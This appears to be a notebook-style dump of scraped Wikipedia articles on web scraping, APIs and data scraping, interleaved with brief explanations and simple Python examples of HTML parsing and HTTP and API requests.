686 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Blog_scraping | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
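The scraped article above mentions two common extraction approaches: plain regular-expression matching on the raw markup, and DOM parsing of the page tree (with XPath- or selector-style retrieval of elements). Below is a minimal sketch of both, using the requests and BeautifulSoup libraries already imported earlier in this notebook; the target URL and the choice of h2 headings are illustrative assumptions, not something taken from the article.

import re
import requests
from bs4 import BeautifulSoup

# Illustrative target page (an assumption for this sketch)
URL = "https://en.wikipedia.org/wiki/Web_scraping"
html = requests.get(URL, timeout=10).text

# Approach 1: regular-expression matching on the raw markup
# (quick to write, but brittle if the page layout changes)
headings_by_regex = re.findall(r"<h2[^>]*>(.*?)</h2>", html, flags=re.DOTALL)

# Approach 2: DOM parsing with BeautifulSoup
# (works on the parsed element tree rather than on raw text)
soup = BeautifulSoup(html, "html5lib")
headings_by_dom = [h2.get_text(strip=True) for h2 in soup.find_all("h2")]

print(headings_by_regex[:5])
print(headings_by_dom[:5])

The regex results still contain leftover inner markup, which is exactly the fragility the DOM-based approach avoids.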
688 | https://en.wikipedia.org/wiki/Web_scraping | https://is.wikipedia.org/wiki/Vefs%C3%B6fnun | Web harvesting (Icelandic: Vefsöfnun) is a technical method of collecting data from websites. In a certain sense it imitates the human activity of browsing the web, either by building a program that uses the Hypertext Transfer Protocol or by using a browser such as Internet Explorer or Mozilla Firefox. A program called Heritrix has been developed, originally to harvest websites for the Internet Archive, and it is now used widely, including by the National and University Library of Iceland (Landsbókasafn Íslands - Háskólabókasafn). |
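The translated passage above notes that a harvester can either speak HTTP directly or drive a full browser. As a rough illustration of the first option, here is a minimal sketch that issues a GET request with Python's standard http.client module, with no browser or third-party library involved; the host, path, and User-Agent string are assumptions chosen only for the example.

import http.client

# Illustrative host and path (assumptions for this sketch)
HOST = "ifconfig.me"
PATH = "/"

# Speak HTTP directly, without a browser or a high-level library
conn = http.client.HTTPSConnection(HOST, timeout=10)
conn.request("GET", PATH, headers={"User-Agent": "simple-harvester-sketch"})
response = conn.getresponse()
body = response.read().decode("utf-8", errors="replace")
conn.close()

print(response.status, response.reason)
print(body[:200])  # first part of the raw response body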
689 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Application_programming_interface | An application programming interface (API) is a way for two or more computer programs or components to communicate with each other. It is a type of software interface, offering a service to other pieces of software. 1 A document or standard that describes how to build or use such a connection or interface is called an API specification. A computer system that meets this standard is said to implement or expose an API. The term API may refer either to the specification or to the implementation. Whereas a system's user interface dictates how its end-users interact with the system in question, its API dictates how to write code that takes advantage of that system's capabilities. In contrast to a user interface, which connects a computer to a person, an application programming interface connects computers or pieces of software to each other. It is not intended to be used directly by a person (the end user) other than a computer programmer who is incorporating it into the software. An API is often made up of different parts which act as tools or services that are available to the programmer. A program or a programmer that uses one of these parts is said to call that portion of the API. The calls that make up the API are also known as subroutines, methods, requests, or endpoints. An API specification defines these calls, meaning that it explains how to use or implement them. One purpose of APIs is to hide the internal details of how a system works, exposing only those parts that a programmer will find useful, and keeping them consistent even if the internal details change later. An API may be custom-built for a particular pair of systems, or it may be a shared standard allowing interoperability among many systems. There are APIs for programming languages, software libraries, computer operating systems, and computer hardware. APIs originated in the 1940s, though the term did not emerge until the 1960s and 1970s. Contemporary usage of the term API often refers to web APIs, 2 which allow communication between computers that are joined by the internet. Recent developments in APIs have led to the rise in popularity of microservices, which are loosely coupled services accessed through public APIs. 3 APIs should be versioned. There are two common versioning strategies: 4 In building applications, an API simplifies programming by abstracting the underlying implementation and only exposing objects or actions the developer needs. While a graphical interface for an email client might provide a user with a button that performs all the steps for fetching and highlighting new emails, an API for file input output might give the developer a function that copies a file from one location to another without requiring that the developer understand the file system operations occurring behind the scenes. 5 The term API initially described an interface only for end-user-facing programs, known as application programs. This origin is still reflected in the name "application programming interface. Today, the term is broader, including also utility software and even hardware interfaces. 7 The idea of the API is much older than the term itself. British computer scientists Maurice Wilkes and David Wheeler worked on a modular software library in the 1940s for EDSAC, an early computer. The subroutines in this library were stored on punched paper tape organized in a filing cabinet. 
This cabinet also contained what Wilkes and Wheeler called a "library catalog" of notes about each subroutine and how to incorporate it into a program. Today, such a catalog would be called an API (or an API specification or API documentation) because it instructs a programmer on how to use (or "call") each subroutine that the programmer needs. 7 Wilkes and Wheeler's 1951 book The Preparation of Programs for an Electronic Digital Computer contains the first published API specification. Joshua Bloch considers that Wilkes and Wheeler "latently invented" the API because it is more of a concept that is discovered than invented. 7 The term "application program interface" (without an ing suffix) is first recorded in a paper called Data structures and techniques for remote computer graphics presented at an AFIPS conference in 1968. 9 7 The authors of this paper use the term to describe the interaction of an application—a graphics program in this case—with the rest of the computer system. A consistent application interface (consisting of Fortran subroutine calls) was intended to free the programmer from dealing with idiosyncrasies of the graphics display device, and to provide hardware independence if the computer or the display were replaced. 8 The term was introduced to the field of databases by C. J. Date 10 in a 1974 paper called The Relational and Network Approaches: Comparison of the Application Programming Interface. 11 An API became a part of the ANSI SPARC framework for database management systems. This framework treated the application programming interface separately from other interfaces, such as the query interface. Database professionals in the 1970s observed these different interfaces could be combined; a sufficiently rich application interface could support the other interfaces as well. 6 This observation led to APIs that supported all types of programming, not just application programming. By 1990, the API was defined simply as "a set of services available to a programmer for performing certain tasks" by technologist Carl Malamud. 12 The idea of the API was expanded again with the dawn of remote procedure calls and web APIs. As computer networks became common in the 1970s and 1980s, programmers wanted to call libraries located not only on their local computers but on computers located elsewhere. These remote procedure calls were well supported by the Java language in particular. In the 1990s, with the spread of the internet, standards like CORBA, COM, and DCOM competed to become the most common way to expose API services. 13 Roy Fielding's dissertation Architectural Styles and the Design of Network-based Software Architectures at UC Irvine in 2000 outlined Representational state transfer (REST) and described the idea of a "network-based Application Programming Interface" that Fielding contrasted with traditional "library-based" APIs. 14 XML and JSON web APIs saw widespread commercial adoption beginning in 2000 and continuing as of 2022. The web API is now the most common meaning of the term API. 2 The Semantic Web proposed by Tim Berners-Lee in 2001 included "semantic APIs" that recasts the API as an open, distributed data interface rather than a software behavior interface. 15 Proprietary interfaces and agents became more widespread than open ones, but the idea of the API as a data interface took hold. Because web APIs are widely used to exchange data of all kinds online, API has become a broad term describing much of the communication on the internet. 
13 When used in this way, the term API has overlap in meaning with the term communication protocol. The interface to a software library is one type of API. The API describes and prescribes the "expected behavior" (a specification) while the library is an "actual implementation" of this set of rules. A single API can have multiple implementations (or none, being abstract) in the form of different libraries that share the same programming interface. The separation of the API from its implementation can allow programs written in one language to use a library written in another. For example, because Scala and Java compile to compatible bytecode, Scala developers can take advantage of any Java API. 16 API use can vary depending on the type of programming language involved. An API for a procedural language such as Lua could consist primarily of basic routines to execute code, manipulate data or handle errors while an API for an object-oriented language, such as Java, would provide a specification of classes and its class methods. 17 18 Hyrum's law states that "With a sufficient number of users of an API, it does not matter what you promise in the contract: all observable behaviors of your system will be depended on by somebody. 19 Meanwhile, several studies show that most applications that use an API tend to use a small part of the API. 20 Language bindings are also APIs. By mapping the features and capabilities of one language to an interface implemented in another language, a language binding allows a library or service written in one language to be used when developing in another language. citation needed Tools such as SWIG and F2PY, a Fortran-to-Python interface generator, facilitate the creation of such interfaces. 21 An API can also be related to a software framework: a framework can be based on several libraries implementing several APIs, but unlike the normal use of an API, the access to the behavior built into the framework is mediated by extending its content with new classes plugged into the framework itself. Moreover, the overall program flow of control can be out of the control of the caller and in the framework's hands by inversion of control or a similar mechanism. 22 23 An API can specify the interface between an application and the operating system. 24 POSIX, for example, provides a set of common API specifications that aim to enable an application written for a POSIX conformant operating system to be compiled for another POSIX conformant operating system. Linux and Berkeley Software Distribution are examples of operating systems that implement the POSIX APIs. 25 Microsoft has shown a strong commitment to a backward-compatible API, particularly within its Windows API (Win32) library, so older applications may run on newer versions of Windows using an executable-specific setting called "Compatibility Mode". 26 An API differs from an application binary interface (ABI) in that an API is source code based while an ABI is binary based. For instance, POSIX provides APIs while the Linux Standard Base provides an ABI. 27 28 Remote APIs allow developers to manipulate remote resources through protocols, specific standards for communication that allow different technologies to work together, regardless of language or platform. 
For example, the Java Database Connectivity API allows developers to query many different types of databases with the same set of functions, while the Java remote method invocation API uses the Java Remote Method Protocol to allow invocation of functions that operate remotely but appear local to the developer. 29 30 Therefore, remote APIs are useful in maintaining the object abstraction in object-oriented programming; a method call, executed locally on a proxy object, invokes the corresponding method on the remote object, using the remoting protocol, and acquires the result to be used locally as a return value. A modification of the proxy object will also result in a corresponding modification of the remote object. 31 Web APIs are a service accessed from client devices (mobile phones, laptops, etc.) to a web server using the Hypertext Transfer Protocol (HTTP). Client devices send a request in the form of an HTTP request, and are met with a response message usually in JavaScript Object Notation (JSON) or Extensible Markup Language (XML) format. Developers typically use Web APIs to query a server for a specific set of data from that server. An example might be a shipping company API that can be added to an eCommerce-focused website to facilitate ordering shipping services and automatically include current shipping rates, without the site developer having to enter the shipper's rate table into a web database. While "web API" historically has been virtually synonymous with web service, the recent trend (so-called Web 2.0) has been moving away from Simple Object Access Protocol (SOAP) based web services and service-oriented architecture (SOA) towards more direct representational state transfer (REST) style web resources and resource-oriented architecture (ROA). 32 Part of this trend is related to the Semantic Web movement toward Resource Description Framework (RDF), a concept to promote web-based ontology engineering technologies. Web APIs allow the combination of multiple APIs into new applications known as mashups. 33 In the social media space, web APIs have allowed web communities to facilitate sharing content and data between communities and applications. In this way, content that is created in one place dynamically can be posted and updated to multiple locations on the web. 34 For example, Twitter's REST API allows developers to access core Twitter data and the Search API provides methods for developers to interact with Twitter Search and trends data. 35 The design of an API has a significant impact on its usage. 5 First of all, the design of programming interfaces represents an important part of software architecture, the organization of a complex piece of software. 36 The principle of information hiding describes the role of programming interfaces as enabling modular programming by hiding the implementation details of the modules so that users of modules need not understand the complexities inside the modules. 37 Aside from the previous underlying principle, other metrics for measuring the usability of an API may include properties such as functional efficiency, overall correctness, and learnability for novices. 38 One straightforward and commonly adopted way of designing APIs is to follow Nielsen's heuristic evaluation guidelines. The Factory method pattern is also typical in designing APIs due to their reusable nature. 39 Thus, the design of an API attempts to provide only the tools a user would expect. 5 An application programming interface can be synchronous or asynchronous. 
A synchronous API call is a design pattern where the call site is blocked while waiting for the called code to finish. 40 With an asynchronous API call, however, the call site is not blocked while waiting for the called code to finish, and instead the calling thread is notified when the reply arrives. API security is very critical when developing a public facing API. Common threats include SQL injection, Denial-of-service attack (DoS), broken authentication, and exposing sensitive data. 41 Without ensuring proper security practices, bad actors can get access to information they should not have or even gain privileges to make changes to your server. Some common security practices include proper connection security using HTTPS, content security to mitigate data injection attacks, and requiring an API key to use your service. 42 Many public facing API services require you to use an assigned API key, and will refuse to serve data without sending the key with your request. 43 APIs are one of the more common ways technology companies integrate. Those that provide and use APIs are considered as being members of a business ecosystem. 44 The main policies for releasing an API are: 45 An important factor when an API becomes public is its "interface stability". Changes to the API—for example adding new parameters to a function call—could break compatibility with the clients that depend on that API. 49 When parts of a publicly presented API are subject to change and thus not stable, such parts of a particular API should be documented explicitly as "unstable". For example, in the Google Guava library, the parts that are considered unstable, and that might change soon, are marked with the Java annotation Beta. 50 A public API can sometimes declare parts of itself as deprecated or rescinded. This usually means that part of the API should be considered a candidate for being removed, or modified in a backward incompatible way. Therefore, these changes allow developers to transition away from parts of the API that will be removed or not supported in the future. 51 On February 19, 2020, Akamai published their annual "State of the Internet" report, showcasing the growing trend of cybercriminals targeting public API platforms at financial services worldwide. From December 2017 through November 2019, Akamai witnessed 85.42 billion credential violation attacks. About 20%, or 16.55 billion, were against hostnames defined as API endpoints. Of these, 473.5 million have targeted financial services sector organizations. 52 API documentation describes the services an API offers and how to use those services, aiming to cover everything a client would need to know for practical purposes. Documentation is crucial for the development and maintenance of applications using the API. 53 API documentation is traditionally found in documentation files but can also be found in social media such as blogs, forums, and Q A websites. 54 Traditional documentation files are often presented via a documentation system, such as Javadoc or Pydoc, that has a consistent appearance and structure. However, the types of content included in the documentation differ from API to API. 55 In the interest of clarity, API documentation may include a description of classes and methods in the API as well as "typical usage scenarios, code snippets, design rationales, performance discussions, and contracts", but implementation details of the API services themselves are usually omitted. 
Reference documentation for a REST API can be generated automatically from an OpenAPI document, which is a machine-readable text file that uses a prescribed format and syntax defined in the OpenAPI Specification. The OpenAPI document defines basic information such as the API's name and description, as well as describing operations the API provides access to. 56 API documentation can be enriched with metadata information like Java annotations. This metadata can be used by the compiler, tools, and by the run-time environment to implement custom behaviors or custom handling. 57 In 2010, Oracle Corporation sued Google for having distributed a new implementation of Java embedded in the Android operating system. 58 Google had not acquired any permission to reproduce the Java API, although permission had been given to the similar OpenJDK project. Google had approached Oracle to negotiate a license for their API, but were turned down due to trust issues. Despite the disagreement, Google chose to use Oracle's code anyway. Judge William Alsup ruled in the Oracle v. Google case that APIs cannot be copyrighted in the U.S and that a victory for Oracle would have widely expanded copyright protection to a "functional set of symbols" and allowed the copyrighting of simple software commands: To accept Oracle's claim would be to allow anyone to copyright one version of code to carry out a system of commands and thereby bar all others from writing its different versions to carry out all or part of the same commands. 59 60 Alsup's ruling was overturned in 2014 on appeal to the Court of Appeals for the Federal Circuit, though the question of whether such use of APIs constitutes fair use was left unresolved. 61 62 In 2016, following a two-week trial, a jury determined that Google's reimplementation of the Java API constituted fair use, but Oracle vowed to appeal the decision. 63 Oracle won on its appeal, with the Court of Appeals for the Federal Circuit ruling that Google's use of the APIs did not qualify for fair use. 64 In 2019, Google appealed to the Supreme Court of the United States over both the copyrightability and fair use rulings, and the Supreme Court granted review. 65 Due to the COVID 19 pandemic, the oral hearings in the case were delayed until October 2020. 66 The case was decided by the Supreme Court in Google's favor with a ruling of 6 2. Justice Stephen Breyer delivered the opinion of the court and at one point mentioned that "The declaring code is, if copyrightable at all, further than are most computer programs from the core of copyright. This means the code used in APIs are more similar to dictionaries than novels in terms of copyright protection. 67 |
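The scraped API article above describes the typical web API exchange: an HTTP request, often carrying an API key, answered with structured JSON rather than HTML. The sketch below shows that pattern with the requests library; the endpoint URL, the Bearer header, the parameter names, and the "results" field are all placeholders assumed for illustration, not a real service contract.

import requests

# Hypothetical endpoint and key (placeholders, not a real service)
API_URL = "https://api.example.com/v1/products"
API_KEY = "YOUR_API_KEY"

# Many public APIs expect the key with every request and refuse to serve data without it
headers = {"Authorization": f"Bearer {API_KEY}"}
params = {"query": "web scraping", "limit": 5}

response = requests.get(API_URL, headers=headers, params=params, timeout=10)
response.raise_for_status()           # surface HTTP errors instead of continuing silently
data = response.json()                # structured JSON, no HTML parsing needed

for item in data.get("results", []):  # "results" is an assumed field name
    print(item)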
691 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_note-10 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. 
Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 
